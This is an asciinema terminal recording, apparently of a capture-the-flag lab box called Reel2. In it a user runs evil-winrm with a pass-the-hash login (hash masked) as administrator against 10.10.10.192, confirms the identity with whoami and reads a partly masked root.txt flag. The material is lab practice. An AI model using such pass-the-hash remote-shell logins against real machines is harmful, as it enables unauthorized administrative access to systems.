{"version": 2, "width": 155, "height": 37, "timestamp": 1591700762, "env": {"SHELL": "/usr/bin/zsh", "TERM": "screen"}}
[0.037255, "o", "\u001b[1m\u001b[3m\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                          \r \r\u001bk/home/DEDSEC\u001b\\"]
[0.04006, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mDEDSEC\u001b[00m \u001b[K"]
[0.040109, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[0.493179, "o", "asciinema rec"]
[0.637248, "o", "\u001b[13Devil-winrm -i 10.10.10.192 -u administrator -H XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX "]
[1.073792, "o", "\u001b[?1l\u001b>"]
[1.073949, "o", "\u001b[?2004l\r\r\n"]
[1.074077, "o", "\u001bkevil-winrm\u001b\\"]
[1.387618, "o", "\r\n\u001b[0;34mEvil-WinRM shell v2.3\u001b[0m\r\n\r\n\u001b[0;34mInfo: Establishing connection to remote endpoint\u001b[0m\r\n\r\n"]
[6.036458, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[8.296393, "o", "w"]
[8.432942, "o", "h"]
[8.685007, "o", "o"]
[8.807375, "o", "a"]
[8.937548, "o", "m"]
[9.844486, "o", "i"]
[10.075148, "o", "\r\n"]
[11.058651, "o", "Reel2\\administrator\r\n"]
[12.536512, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[12.977031, "o", "c"]
[13.099096, "o", "a"]
[13.365608, "o", "t"]
[13.596196, "o", " "]
[14.035234, "o", "."]
[14.17957, "o", "."]
[14.51095, "o", "/"]
[14.856116, "o", "D"]
[15.057831, "o", "e"]
[15.259334, "o", "s"]
[15.425014, "o", "k"]
[15.756395, "o", "t"]
[15.936484, "o", "o"]
[16.080382, "o", "p"]
[16.418701, "o", "/"]
[16.699671, "o", "r"]
[16.865269, "o", "o"]
[16.980624, "o", "o"]
[17.110058, "o", "t"]
[17.304552, "o", "."]
[17.643095, "o", "t"]
[17.779971, "o", "x"]
[17.85179, "o", "t"]
[18.175667, "o", "\r\n"]
[19.064781, "o", "81d----------------------------4ef0\r\n"]
[20.502473, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[21.89149, "o", "\r\n[1]  + 2006 suspended  evil-winrm -i 10.10.10.192 -u administrator -H \r\n"]
[21.89171, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                          \r \r\u001bk/home/DEDSEC\u001b\\"]
[21.894639, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mDEDSEC\u001b[00m \u001b[K\u001b[?1h\u001b="]
[21.894688, "o", "\u001b[?2004h"]
[22.409595, "o", "\u001b[?2004l\r\r\n"]
[22.409765, "o", "zsh: you have suspended jobs.\r\n\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                          \r \r"]
[22.409868, "o", "\u001bk/home/DEDSEC\u001b\\"]
[22.41312, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mDEDSEC\u001b[00m \u001b[K\u001b[?1h\u001b="]
[22.413157, "o", "\u001b[?2004h"]
[22.740924, "o", "\u001b[?2004l\r\r\n"]
